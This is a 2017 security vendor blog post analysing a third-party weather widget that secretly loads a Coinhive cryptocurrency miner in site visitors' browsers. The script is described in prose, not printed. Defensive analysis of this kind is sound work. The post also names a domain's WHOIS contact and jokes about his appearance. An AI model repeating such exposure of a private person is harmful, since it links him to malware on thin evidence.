contact us see demo
Learn about RiskSense Products

Take me back to RiskSense.com
Nate Caroe - Dec 28, 2017

What Dangers are Hiding in Your Website's Third-Party Widgets?

What Dangers are Hiding in Your Website's Third-Party Widgets?

If you visit roadrunnernm.com, you may notice one of two things. Either the fans in your computer will start to spin very fast and make a lot of noise or your antivirus will (hopefully) pop a friendly alert that something malicious is going on with your browser. Why? Because unsuspecting visitors to this site are being exposed to a *drum roll* cryptocurrency miner!

Unusual CPU Activity When Visiting a Website

Now, roadrunnernm.com isn't a fake company, and the webmaster isn't a malicious actor. So, how is this possible? Was roadrunnernm.com defaced? Actually, the problem lies in a small weather widget that's available on the site.

Weather Widget on Website

Firing up Burp Suite, we can see the requests being made through our proxy. The most recent request is made to a subdomain on coinhive.com, which is a glaring problem since I don't remember opting in to use the service. We can look at the previous request to get some insight on where this is coming from.

Using BurpSuite to see requests made through our proxy.

The weather widget makes a call back to weatherfor.us for local weather information but also sources an interesting JavaScript file, twantu.js, and runs the command RunAd(). Let's look at some source code!

Source Code Observations

Ah, well, of course it's minified, because the last thing you want is for your cryptocurrency mining boot script to take up more space than necessary.

Expanded Source Code

Much better. Clearly we see that twantu.js sources a JavaScript file from Coinhive and starts a miner using the referrer and a randomly generated key.

Obviously, the fault of roadrunnernm.com is that they are using an untrusted weather plugin, but is weatherfor.us a legitimate service that was breached or is it the malicious actor? The twantu.js file is being hosted on weatherfor.us under /static/js/twantu.js, so it's possible that an attacker managed to gain access to the file system and uploaded this file along with modifying the weather widget to source twantu.js. The problem with this, however, is that the referrer and random key aren't being generated by JavaScript, they're being created by Express. A malicious actor would need to first have access to the application framework, which means having control over the web server.

A quick WHOIS for weatherfor.us:

WHOIS for weatherfor.us

Aaand a quick Google search:

Google Search of Administrative Contact's Name

Handsome looking guy! Unfortunately, I doubt Mr. Hassan created a weather widget that mines cryptocurrency. ¯\_(ツ)_/¯

The next question is, "How many sites are using this widget?" Well, this is where things get tricky. We can't Google Dork our way into finding which sites are using this because it's in the HTML. Using services like nerdydata.com and publicwww.com, we can tell there are about 300 websites that are using this widget, but we can't confirm most of these because they're hidden behind a paywall.

What do we take from this? Don't install or use untrusted third-party widgets or applications. Simple as that. Also, if you're using the weather widget from weatherfor.us, then maybe it's time to find a new one.


Reveal Cyber Risk Across a Growing Attack Surface




contact us at +1 505.217.9422

  • follow us
© 2017 RiskSense, Inc. All rights reserved. Use of this website assumes acceptance of Legal Notices, Privacy Policy, Service Level Agreement and Acceptable Use Policy.